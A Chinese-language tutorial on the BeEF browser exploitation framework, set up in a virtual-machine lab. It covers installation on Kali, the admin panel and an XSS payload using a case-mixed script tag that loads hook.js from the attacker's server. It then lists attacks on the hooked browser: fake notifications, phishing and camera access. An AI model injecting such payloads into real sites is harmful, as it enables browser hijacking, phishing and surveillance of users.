BeEF介绍
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。
BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。BeEF服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。
使用BeEF
在这里准备使用liunx环境进行安装BeEF的,由于国内环境太差,环境安装不上,所以放弃,使用kali,kali上面安装BeEF比较简单
使用环境:kali 2019-04
下载kali的国内下载网站http://tel.mirrors.163.com/
安装过程省略,
安装beef-xss
apt-get install beef-xss
然后切换到beef的安装目录
cd /usr/share/beef-xss
现在不能直接启动beef
如果直接启动会有一个报错
change the beef.credentials.passwd in /etc/beef-xss/config.yaml
我们需要修改密码
修改密码
首先打开config.yaml
这里是默认的账户密码,可以进行修改,修改完成之后
启动beef-xss
./beef
启动之后会产生很多内容,我们需要了解的就是
http://127.0.0.1:3000/hook.js -钩子
http://127.0.0.1:3000/ui/panel
管理平台
由于是在虚拟机中间,可以使用ip地址打开
http://192.168.110.135:3000/ui/panel
密码就是我们修改的账户密码
打开beef-xss
入侵客户端
打开我们的存在xss漏洞的网页,输入下面的语句
<sCRiPt sRC=http://192.168.110.135:3000/hook.js></sCrIpT>
可以看出这个hook.js是生效的
在受害者这里也出现了我们的主机
可以看见很多隐私内容,进行操作
对主机进行攻击
选择不同的插件进行操作
例子:
1.假通知栏
设置通知栏
效果
2.网络钓鱼
效果
3.调用摄像头
效果
总结
beef-xss是对于XSS漏洞的最高利用,避免自己写复杂的js代码很容易达到自己的目的。网络很危险,安全靠自己!